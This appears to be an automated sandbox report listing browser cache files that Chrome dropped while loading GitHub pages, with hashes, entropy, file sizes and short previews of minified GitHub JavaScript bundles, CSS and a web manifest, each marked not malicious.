                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2"],{46263:(e,t,s)=>{function n(e,t=0,{start:s=!0,middle:n=!0,once:i=!1}={}){let r,a=0,o=!1;function l(...c){if(o)return;let h=Date.now()-a;a=Date.now(),s?(s=!1,e.apply(this,c),i&&l.cancel()):(n&&h<t||!n)&&(clearTimeout(r),r=setTimeout(()=>{a=Date.now(),e.apply(this,c),i&&l.cancel()},n?t-h:t))}return l.cancel=()=>{clearTimeout(r),o=!0},l}function i(e,t=0,{start:s=!1,middle:i=!1,once:r=!1}={}){return n(e,t,{start:s,middle:i,once:r})}s.d(t,{D:()=>i,P:()=>n})},27907:(e,t,s)=>{s.d(t,{a:()=>AliveSession});var n,i=s(81855),r=s(60835),a=s(16544),o=s(75658),l=s(80955),c=s(29871);!function(e){e.Deploy="Alive Redeploy",e.Reconnect="Alive Reconnect"}(n||(n={}));let AliveSession=class AliveSession{constructor(e,t,s,n,a=6e5){this.url=e,this.getUrl=t,this.inSharedWorker=s,this.notify=n,this.maxReconnectBackoff=a,this.subscriptio
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (14686)
                                                                                      Category:dropped
                                                                                      Size (bytes):14828
                                                                                      Entropy (8bit):5.192072508056627
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:0PaW5ABx7jkqeGC9wsVAr3/k5DkhTP+rrHFoV7u+mvI/c/XqnUEIhA:0steu0KvkZkhGrz+mvI/MKp
                                                                                      MD5:9A434E459EE65DE00366A7AF474BC094
                                                                                      SHA1:CB74381CF732E2572C1206C193D230016A640C27
                                                                                      SHA-256:DA62F189CDDA98ADCA343D78AFD58F80D50C70B51BEB1A9D348A40A70E328A4C
                                                                                      SHA-512:11F6759E1CEF439A8C86DC954CB261F89CC888795A18D15978405C4CC15594723C7A49DA6D51B565CC1B9B7FD7E3BE53F2960189348E5E28265A2DC575536DD8
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67","vendors-node_modules_delegated-events_dist_index_js-node_modules_github_template-parts_lib_index_js"],{65935:(e,t,n)=>{let r;n.d(t,{AC:()=>u,rK:()=>l,uT:()=>a});let ErrorWithResponse=class ErrorWithResponse extends Error{constructor(e,t){super(e),this.response=t}};function i(){let e,t;let n=new Promise(function(n,r){e=n,t=r});return[n,e,t]}let o=[],s=[];function a(e){o.push(e)}function l(e){s.push(e)}function u(e,t){r||(r=new Map,"undefined"!=typeof document&&document.addEventListener("submit",c));let n=r.get(e)||[];r.set(e,[...n,t])}function c(e){if(!(e.target instanceof HTMLFormElement)||e.defaultPrevented)return;let t=e.target,n=function(e){let t=[];for(let n of r.keys())if(e.matches(n)){let e=r.get(n)||[];t.push(...e)}return t}(t);if(0===n.length)return;let a=function(e){let t={method:e.method||"GET",url:e.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (31112)
                                                                                      Category:dropped
                                                                                      Size (bytes):31162
                                                                                      Entropy (8bit):4.9320557915793275
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:aTzuitFH6trQFCXJSqINuq/NA7YaPgqZ5+:LsZs5+
                                                                                      MD5:BADBCCFC77C563BF92236B56E599159B
                                                                                      SHA1:04B935D99DA11DF7D12BA93B4FCE2B90CA5812C4
                                                                                      SHA-256:C907C436A24B4080610A9EFA8B00C6EECE933C4A567DCDE44CBA72E534C796D1
                                                                                      SHA-512:AD2FCE00D0031B412B27E45E82C9118D4C73C83DD35E102EFDE1028C1AFA89D48DC3753C4345E0606A2252DD43047F51068F44FFB96EBD7D5594D9D746805FE6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.BorderGrid{display:table;width:100%;margin-top:-16px;margin-bottom:-16px;table-layout:fixed;border-collapse:collapse;border-style:hidden}.BorderGrid .BorderGrid-cell{padding-top:16px;padding-bottom:16px}.BorderGrid--spacious{margin-top:-24px;margin-bottom:-24px}.BorderGrid--spacious .BorderGrid-cell{padding-top:24px;padding-bottom:24px}.BorderGrid-row{display:table-row}.BorderGrid-cell{display:table-cell;border:1px solid var(--borderColor-muted, var(--color-border-muted))}.blame-commit{-webkit-user-select:none;user-select:none}.blame-commit[data-heat="1"]{border-right:2px solid #f66a0a}.blame-commit[data-heat="2"]{border-right:2px solid rgba(246,106,10,.9)}.blame-commit[data-heat="3"]{border-right:2px solid rgba(246,106,10,.8)}.blame-commit[data-heat="4"]{border-right:2px solid rgba(246,106,10,.7)}.blame-commit[data-heat="5"]{border-right:2px solid rgba(246,106,10,.6)}.blame-commit[data-heat="6"]{border-right:2px solid rgba(246,106,10,.5)}.blame-commit[data-heat="7"]{border-right:2px
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (16406)
                                                                                      Category:dropped
                                                                                      Size (bytes):16549
                                                                                      Entropy (8bit):5.222298975782681
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:ccvwYZ1vv23r2/4cyzJh7cDbkKqNYf8NTkFWZT4dB:1lve2wrGbkKqNYzFWZT8B
                                                                                      MD5:8BA02E7B991769E3ACD1F26A4645A178
                                                                                      SHA1:48FC9163B531464A3339FFBDC50A06DF04F66A3B
                                                                                      SHA-256:00D2C1D1CD991A3BF25D1C3683C2E7BCEC9FE4A9519FBDF4052A31E18DA18F90
                                                                                      SHA-512:B93616E2FC1475521F045AFBD99191C3F8E35D1B158421A5F5B56929AE3BEA75FB07786D4012E820DCE71DF26E5015D25D3BB9C90F84BCDD2ED73D87EDC7BD2B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537341","vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0","vendors-node_modules_github_remote-form_dist_index_js-node_modules_github_catalyst_lib_index_-eccae9","vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc1","vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537340","vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537342","vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-b4a243","vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js"],{65935:(e,t,n)=>{let o;n.d(t,{AC:()=>c,rK:()=>l,uT:()=>a});let ErrorWithResponse=class ErrorWithRespons
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (9187)
                                                                                      Category:dropped
                                                                                      Size (bytes):9292
                                                                                      Entropy (8bit):5.387531032933517
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:TGTc1UxQC77fF/wLPSCUg5uxivN5CDEUFeL0:T4c8YLIi6EUFeg
                                                                                      MD5:AEC0D6B57EC1325846CD98252B945BDD
                                                                                      SHA1:BD5314F304E86BAB34024037C9B35E6CB100A12A
                                                                                      SHA-256:1B398648706131AFC5312E0EF1F507DD5D90259845BD7B51B11D45E1A486D64B
                                                                                      SHA-512:89FA5806AA3CDFDED851A8B0B7876CB9A32D77BA7103AB971D61F3E61445C889261CDEADB5727D599D7992D544EE3F5258AABE99660C8D1FC74E2832AB64D7C1
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_UnderlineNav_index_js"],{17580:(e,t,n)=>{n.d(t,{J:()=>V});var a=n(67294),l=n(42483),r=n(15173);let i=(0,a.createContext)({theme:{},setChildrenWidth:()=>null,setNoIconChildrenWidth:()=>null,loadingCounters:!1,iconsVisible:!0});var o=n(8930),s=n(8386),c=n(53670);let d={alignItems:"center",display:"inline-flex",marginRight:2},u={marginLeft:2,display:"flex",alignItems:"center"},p=e=>({display:"flex",paddingX:3,justifyContent:"flex-start",borderBottom:"1px solid",borderBottomColor:`${null==e?void 0:e.colors.border.muted}`,align:"row",alignItems:"center",minHeight:"48px"}),m={display:"flex",listStyle:"none",whiteSpace:"nowrap",paddingY:0,paddingX:0,margin:0,marginBottom:"-1px",alignItems:"center",gap:"8px",position:"relative"},f=e=>({display:"inline-block",borderLeft:"1px solid",width:"1px",borderLeftColor:`${null==e?void 0:e.colors.border.muted}`,marginRight:1,height:"24px"})
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (64468)
                                                                                      Category:dropped
                                                                                      Size (bytes):71455
                                                                                      Entropy (8bit):5.453302632952931
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:4iWOOUcbPJHL82Jidk/OcTzTLIHkrPBmGRaNT:4iphRCZTB3aB
                                                                                      MD5:D5186B8370FC6A731F57FAD7A6D57ACA
                                                                                      SHA1:6F6179A2E26A26CFF3AB4BD163AE74E8800566A9
                                                                                      SHA-256:7CEE3366D18EC5C133E517902F70648BAC0EFC4794D587AF9C573B357CDB0CB0
                                                                                      SHA-512:F8DB4E5BB6CA0CB855055BB0798B404B2FBAB18C7E700B2C399429539373DAAABC130ACB743387555E0ECF7A019BB0B09453F3E46029A00888F06309BFFB258C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_react-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_ho-3e492a"],{55822:(e,t,r)=>{r.d(t,{f:()=>o});var i=r(67294);function o(e){let t=(0,i.useRef)([]);for(let r of t.current)if(e===r||function e(t,r){if(t===r)return!0;if("object"!=typeof t||typeof t!=typeof r||!t||!r)return!1;if(Array.isArray(t)){if(!Array.isArray(r)||t.length!==r.length)return!1;for(let i=0;i<t.length;i++)if(!e(t[i],r[i]))return!1;return!0}let i=Object.keys(t),o=Object.keys(r);if(i.length!==o.length)return!1;for(let o of i)if(!e(t[o],r[o]))return!1;return!0}(r,e))return r;return t.current.unshift(e),t.current.length>5&&t.current.pop(),e}},29881:(e,t,r)=>{r.d(t,{bx:()=>s,ln:()=>l,tW:()=>c});var i=r(15631),o=r(20679);let n={cursorNavigationHopWordLeft:{hotkey:"Alt+ArrowLeft,Ctrl+ArrowLeft",useWhileBlobFocused:!0,noModifierHotkey:["ArrowLeft"],modifierRequired:!0},cursorNavigationHopWordRight:{hotkey:"Alt+Arro
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (18047)
                                                                                      Category:dropped
                                                                                      Size (bytes):18129
                                                                                      Entropy (8bit):5.4228818523212725
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:1FS9udE6rEYyndI27BMCnHLzytVO/g8tKusKisncS5g63B2P65:G9uG6AYynjBHHLzytVgg8tKSisncS5gq
                                                                                      MD5:AD165A00EEB33A89D627719D2ACCB0E7
                                                                                      SHA1:FDD428BBFDCB1FFD024ABE5BFBC0AFD8F9CC7E31
                                                                                      SHA-256:32D06CC19D9AAF9E0FD54B98CFD865B28D206A5F22DE450F6D1BFA5F1E17ADA6
                                                                                      SHA-512:DBBDEF4348E2490CE6A6B50DEEDCE6987119C874FBC79D606D9905F5CE5185857BA93D0F2C7F56F086352C201E8E3E6ECFA08C8DED50340C4EBF209195EBA298
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_ref-selector_RefSelector_tsx"],{46037:(e,t,r)=>{r.d(t,{W:()=>SearchIndex,r:()=>a});var a,n=r(56363),i=r(43786);let{getItem:s,setItem:c,removeItem:l}=(0,n.Z)("localStorage",{throwQuotaErrorsOnSet:!0});!function(e){e.Branch="branch",e.Tag="tag"}(a||(a={}));let SearchIndex=class SearchIndex{render(){this.selector.render()}async fetchData(){try{if(!this.isLoading||this.fetchInProgress)return;if(!this.bootstrapFromLocalStorage()){this.fetchInProgress=!0,this.fetchFailed=!1;let e=await fetch(`${this.refEndpoint}?type=${this.refType}`,{headers:{Accept:"application/json"}});await this.processResponse(e)}this.isLoading=!1,this.fetchInProgress=!1,this.render()}catch(e){this.fetchInProgress=!1,this.fetchFailed=!0}}async processResponse(e){if(this.emitStats(e),!e.ok){this.fetchFailed=!0;return}let t=e.clone(),r=await e.json();this.knownItems=r.refs,this.cacheKey=r.cacheKey,this.flushToLocalStorage(await t.text()
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (15415)
                                                                                      Category:dropped
                                                                                      Size (bytes):15466
                                                                                      Entropy (8bit):5.2678140824954705
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:0fgXA+K47dQxZ4zmO6rO6BadKc7dlce1iFb8NnCsgUI/R5D//BoXKzFUpmOEjV7w:0fgXA+K47dCb8IQk1wmbcKqTWCwo7
                                                                                      MD5:7AB671FDC37C00BE001B3C090B5A394A
                                                                                      SHA1:5F8153C6CE43BC528A5619D73980917FE10BDE2D
                                                                                      SHA-256:3E56477BC3A74CC323CA5FCD6C3FDE2DDD70968266B5DE6D753EBD6F1C41047D
                                                                                      SHA-512:614FEB194539299E83DB0D583C7F3C32A706E4B120F47B758C4A2E5994C5049ECEC3B29BF440EA125D0373AD5B1609CE415F090CCB1CF1896608F69B88FA4FA5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["code-menu"],{38974:(e,t,o)=>{o(25999)},76250:(e,t,o)=>{o.d(t,{$S:()=>r,Fk:()=>a,sz:()=>i});var n=o(43786);function r(e,t,o){let r={hydroEventPayload:e,hydroEventHmac:t,visitorPayload:"",visitorHmac:"",hydroClientContext:o},a=document.querySelector("meta[name=visitor-payload]");a instanceof HTMLMetaElement&&(r.visitorPayload=a.content);let i=document.querySelector("meta[name=visitor-hmac]")||"";i instanceof HTMLMetaElement&&(r.visitorHmac=i.content),(0,n.b)(r,!0)}function a(e){let t=e.getAttribute("data-hydro-view")||"",o=e.getAttribute("data-hydro-view-hmac")||"",n=e.getAttribute("data-hydro-client-context")||"";r(t,o,n)}function i(e){let t=e.getAttribute("data-hydro-click-payload")||"",o=e.getAttribute("data-hydro-click-hmac")||"",n=e.getAttribute("data-hydro-client-context")||"";r(t,o,n)}},60435:(e,t,o)=>{function n(){return/Windows/.test(navigator.userAgent)?"windows":/Macintosh/.test(navigator.userAgent)?"ma
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (6393)
                                                                                      Category:dropped
                                                                                      Size (bytes):6535
                                                                                      Entropy (8bit):5.373113588645805
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:T0Csyy0Mn6gIPXuJ/0tIPYGeqatMqfu8mstZpt+dmP5:TY+uGuI+s
                                                                                      MD5:61D0A6E5EE83A4326EB3409BF27661DE
                                                                                      SHA1:2EE21C2F15F1FDD7F246958A21505B2DF6C63F11
                                                                                      SHA-256:F9AACA51ED23855023AF8548BBFEE6CE4FFB6D493931D21F148DDE776FECD0A0
                                                                                      SHA-512:829932CF63DB44637BC06D459AFE6B9127DAE7F83A554D7F6C4163F9209F2BE839C592D212416BFAB7F9777E8571858E02A6069BD6545AA518C829931A8111CA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-node_modules_primer_react_lib-es-fa1130"],{8677:(e,t,n)=>{n.d(t,{ZP:()=>p,qK:()=>v,qs:()=>h});var r=n(15388),a=n(67294),l=n(69848),i=n(42379),o=n(16903),u=n(31171),c=n(41905),s=n(15173),d=n(8386);function f(){return(f=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e}).apply(this,arguments)}let v={xsmall:"192px",small:"256px",medium:"320px",large:"432px",xlarge:"600px",auto:"auto",initial:"auto","fit-content":"fit-content"},m={small:"256px",medium:"320px",large:"480px",xlarge:"640px",xxlarge:"960px",auto:"auto"},h=r.ZP.div.withConfig({displayName:"Overlay__StyledOverlay",componentId:"sc-51280t-0"})(["background-color:",";box-shadow:",";position:absolute;min-width:192px;max-width:",";height:",";max-height:",";width:",";borde
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):87
                                                                                      Entropy (8bit):4.486472238279021
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:8FkLKuClEcR7AfgVP/vLKuC1j5NVi:EuCxNAIJ/2uC1Q
                                                                                      MD5:0691813E0E289918FEA1E3AD81757208
                                                                                      SHA1:C48EED1D2D8ADD4D4D8D60B229383C977DBF9349
                                                                                      SHA-256:56A3B41B3ADB53CA7FCE5703EB10DACF0808203E489F09C9F445B7EB6CA3254B
                                                                                      SHA-512:72A0ADB379903D1D5BD2CE1B760E3BF30705EF53C73240FB53ACD9501CCED099B13E71473B6FC00EEA2EC88C9D5A654AAAB0F69706DCB8608CA8AD009D99C5A2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:<strong class="color-fg-default">1</strong>.<span class="color-fg-muted">Branch</span>.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1464
                                                                                      Entropy (8bit):4.979359336813171
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Yd0dsXIoWPhS7G65S7G2VS7G4kDwh7GL+ktqh7Gin87GZS47G027GMf+7GF1CNXk:YdGsXqPUEVvDXInmOIWXlELMFI
                                                                                      MD5:D9106D99604E4FE3A89E6BE173B0CE90
                                                                                      SHA1:EDD82F9D26D55DEAB1A17A122288D04830C9674E
                                                                                      SHA-256:C75E05794D72230A695E880F1A6C83A474A033F8660EFF0C9EEB5BF0329C2C8C
                                                                                      SHA-512:3762E0BCD4EA2F7C0ABAAD0523741D843AE0E3DFE0FA3A046A9723BE22B2B6EF04349DCF36E62E7902C59C75D12687F00E31E1DE2CD4DE2AD3E365581E97DAAC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{"name":"GitHub","short_name":"GitHub","start_url":"/","display":"standalone","icons":[{"sizes":"114x114","src":"https://github.githubassets.com/assets/apple-touch-icon-114x114-09ce42d3ca4b.png"},{"sizes":"120x120","src":"https://github.githubassets.com/assets/apple-touch-icon-120x120-92bd46d04241.png"},{"sizes":"144x144","src":"https://github.githubassets.com/assets/apple-touch-icon-144x144-b882e354c005.png"},{"sizes":"152x152","src":"https://github.githubassets.com/assets/apple-touch-icon-152x152-5f777cdc30ae.png"},{"sizes":"180x180","src":"https://github.githubassets.com/assets/apple-touch-icon-180x180-a80b8e11abe2.png"},{"sizes":"57x57","src":"https://github.githubassets.com/assets/apple-touch-icon-57x57-22f09f5b3a64.png"},{"sizes":"60x60","src":"https://github.githubassets.com/assets/apple-touch-icon-60x60-19037ac897bf.png"},{"sizes":"72x72","src":"https://github.githubassets.com/assets/apple-touch-icon-72x72-e090c8a282d0.png"},{"sizes":"76x76","src":"https://github.githubassets.c
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (28736)
                                                                                      Category:dropped
                                                                                      Size (bytes):93964
                                                                                      Entropy (8bit):5.303160281622869
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:q3THO3OxiR2HpUnrI8gKvXoYJPbknnHxkXTtLEIGJVD9/fHGDLCF48yfVYk3Q2/D:Uu3OxDHpsIivXoUkKm3MFOkXxlR0vI
                                                                                      MD5:D7B0A22391D15BA9DB521B44768A5D7B
                                                                                      SHA1:98B1702262A217A3C201101E3EAD54EF6AE368F4
                                                                                      SHA-256:034108E0AE8475FFD13B7B5B842F59975E5473198C9538C91AAFDFD342ED4E51
                                                                                      SHA-512:68B3D6C8FEB272E28B01E2C4EE9B743BB86399300FF34573367CB8D4112175C4FE552E87232D6F021124F02D2A6F9774764150D2FFE2EF90B540767D976B1EF2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-3959a9"],{57260:(t,e,i)=>{i.d(e,{P:()=>Attachment});let Attachment=class Attachment{constructor(t,e){this.file=t,this.directory=e,this.state="pending",this.id=null,this.href=null,this.name=null,this.percent=0}static traverse(t,e){var i;return e&&(i=t).items&&Array.from(i.items).some(t=>{let e=t.webkitGetAsEntry&&t.webkitGetAsEntry();return e&&e.isDirectory})?r("",Array.from(t.items).map(t=>t.webkitGetAsEntry()).filter(t=>null!=t)):Promise.resolve(n(Array.from(t.files||[])).map(t=>new Attachment(t)))}static from(t){let e=[];for(let i of t)if(i instanceof File)e.push(new Attachment(i));else if(i instanceof Attachment)e.push(i);else throw Error("Unexpected type");return e}get fullPath(){return this.directory?`${this.directory}/${this.file.name}`:this.file.name}isImage(){return["image/gif","image/png","image/jpg","image/jpe
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (28505)
                                                                                      Category:dropped
                                                                                      Size (bytes):28561
                                                                                      Entropy (8bit):4.905856473099355
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:mLVhFmmG+zrmrfaeWurZELICuFOqx6UmUgIah:mLpmmG+zSSu9ELICuFOqxHgIah
                                                                                      MD5:0C6E7F9AD3D84702FE070A9DFA3E400E
                                                                                      SHA1:B7779F1B9DABE9A148255F6F6F98CA8545AC4017
                                                                                      SHA-256:07036A0205F8314A3F5CD3EC9EEB44872B79C2418EFC20F0945B0AC5C6A83199
                                                                                      SHA-512:6247CA238FD4503095653DABDA8F9E5937CCE5091EC403D8E613DD2601DB2B9425D103BCB389FB507FD0CC4A205711C2ABB8A7011BC411B65823576A39F355BC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.MatrixComponent-pending{padding:12px;transition:opacity ease-out .12s}.MatrixComponent-collapse--title{line-height:20px}.TagsearchPopover-list .TagsearchPopover-list-item:hover{background-color:var(--bgColor-muted, var(--color-canvas-subtle))}.TagsearchPopover-list .TagsearchPopover-list-item .TagsearchPopover-item:hover{text-decoration:none}.TagsearchPopover-list .blob-code-inner{white-space:pre-wrap}.WorkflowJob-deployment-progress .Progress{background:none}.WorkflowJob-deployment-progress .WorkflowJob-deployment-progress-complete{background-color:var(--color-workflow-card-progress-complete-bg) !important}.WorkflowJob-deployment-progress .WorkflowJob-deployment-progress-incomplete{background-color:var(--color-workflow-card-progress-incomplete-bg) !important}.WorkflowJob{padding:12px;transition:opacity ease-out .12s}.WorkflowJob-title{height:20px;line-height:20px}.WorkflowJob-title::after{position:absolute;top:0;right:0;bottom:0;left:0;content:""}table.capped-list{width:100%;line-hei
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):8022
                                                                                      Entropy (8bit):4.938994822088669
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:eeAaDT1h375UaEZIWWunHlmqEPHp+J2nMamIRfx:9rDT1hQZgPC2nMamIRfx
                                                                                      MD5:C3251B92F88319086A74573C98EF2CD8
                                                                                      SHA1:2DC7EFD06DC7B292579A74EA171CE24DFEE83DC1
                                                                                      SHA-256:90CDD286610F3F9CB21194BDE1233612D62A5CB973C901A04A06FEBE9B285488
                                                                                      SHA-512:366B5C973FADF52874E0D26742CC908EF426910F5B9E92A053E84382145FD7D3672A9EDD392CC26DBF69A26E2BEE200016ECC59E6C396B95D5E1A83887797CA4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview::root {. --base-size-4: 0.25rem;. --base-size-8: 0.5rem;. --base-size-12: 0.75rem;. --base-size-16: 1rem;. --base-size-20: 1.25rem;. --base-size-24: 1.5rem;. --base-size-28: 1.75rem;. --base-size-32: 2rem;. --base-size-36: 2.25rem;. --base-size-40: 2.5rem;. --base-size-44: 2.75rem;. --base-size-48: 3rem;. --base-size-64: 4rem;. --base-size-80: 5rem;. --base-size-96: 6rem;. --base-size-112: 7rem;. --base-size-128: 8rem;.}..:root {. --base-text-weight-light: 300;. --base-text-weight-normal: 400;. --base-text-weight-medium: 500;. --base-text-weight-semibold: 600;.}..:root {. --boxShadow-thin: inset 0 0 0 max(1px, 0.0625rem);. --boxShadow-thick: inset 0 0 0 max(2px, 0.125rem);. --boxShadow-thicker: inset 0 0 0 max(4px, 0.25rem);. --borderWidth-thin: max(1px, 0.0625rem);. --borderWidth-thick: max(2px, 0.125rem);. --borderWidth-thicker: max(4px, 0.25rem);. --borderRadius-small: 0.1875rem;. --borderRadius-medium: 0.375rem;. --borderRadius-large: 0.75rem;. --bord
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):87
                                                                                      Entropy (8bit):4.486472238279021
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:8FkLKuClEcR7AfgVP/vLKuC1j5NVi:EuCxNAIJ/2uC1Q
                                                                                      MD5:0691813E0E289918FEA1E3AD81757208
                                                                                      SHA1:C48EED1D2D8ADD4D4D8D60B229383C977DBF9349
                                                                                      SHA-256:56A3B41B3ADB53CA7FCE5703EB10DACF0808203E489F09C9F445B7EB6CA3254B
                                                                                      SHA-512:72A0ADB379903D1D5BD2CE1B760E3BF30705EF53C73240FB53ACD9501CCED099B13E71473B6FC00EEA2EC88C9D5A654AAAB0F69706DCB8608CA8AD009D99C5A2
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:<strong class="color-fg-default">1</strong>.<span class="color-fg-muted">Branch</span>.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (1078)
                                                                                      Category:dropped
                                                                                      Size (bytes):1179
                                                                                      Entropy (8bit):5.249394863813047
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:X5YJQxNRbYRzpvRy+qFBYgyN0YRZeR/AZimy4imDirXFbzL:X51RSRlqTY7Zid4i7DRH
                                                                                      MD5:4D8C47BB894FCF1E22E85A14F0F00B45
                                                                                      SHA1:D199851202BA40586FFE3908A135A4D986A9B36D
                                                                                      SHA-256:06091031A790661040B0EF5680010D7154D1637ED38395311E0C29782564234E
                                                                                      SHA-512:7C5E7B04EDD6062FD58DCE59B19F18BC717B85AF8F7D0D9D7426A5554CDB4CA199674382DC50DBE2F5E061B0069DCD857578C9D3946F009E10E4679B73C3DC17
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_components_primer_experimental_toggle-switch-element_ts"],{41017:(e,t,i)=>{i.r(t),i.d(t,{ToggleSwitchElement:()=>c});var s=i(76006);function r(e,t,i,s){var r,c=arguments.length,h=c<3?t:null===s?s=Object.getOwnPropertyDescriptor(t,i):s;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)h=Reflect.decorate(e,t,i,s);else for(var l=e.length-1;l>=0;l--)(r=e[l])&&(h=(c<3?r(h):c>3?r(t,i,h):r(t,i))||h);return c>3&&h&&Object.defineProperty(t,i,h),h}let c=class ToggleSwitchElement extends HTMLElement{toggle(){this.isOn()?this.turnOff():this.turnOn()}turnOn(){this.isDisabled()||(this.switch.setAttribute("aria-checked","true"),this.classList.add("ToggleSwitch--checked"))}turnOff(){this.isDisabled()||(this.switch.setAttribute("aria-checked","false"),this.classList.remove("ToggleSwitch--checked"))}isOn(){return"true"===this.switch.getAttribute("aria-checked")}isDisabled(){return"true"===this.switch.getAttribu
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (13627)
                                                                                      Category:dropped
                                                                                      Size (bytes):17614
                                                                                      Entropy (8bit):5.1931543199372
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:MSAF6OodaMWwym8WWkdjWEKpKViqyw/esKcY/5oTP+c4bCUIh6:MSSQhWwh8WWkdiEFViqL/hKl/sUIc
                                                                                      MD5:9DE22227476B5F43133BA812A757CFA8
                                                                                      SHA1:DB832CC1F6D37AE53C2D394AB1E3CDEA771B5B49
                                                                                      SHA-256:ED97F692D0271FBD3525723AF0B8F5B4693549F39D722FDB5B524BB8612FEF58
                                                                                      SHA-512:5C4D940A245A5EC6EBA21B6A7A19CDB14316463F0A0D850A25F97432F260611B938AECF2BCF8DA5C053FE4FE2254069AB12AA3C8C13A8FEAC0B35A44D65CBAFA
                                                                                      Malicious:false
                                                                                      Reputation:low
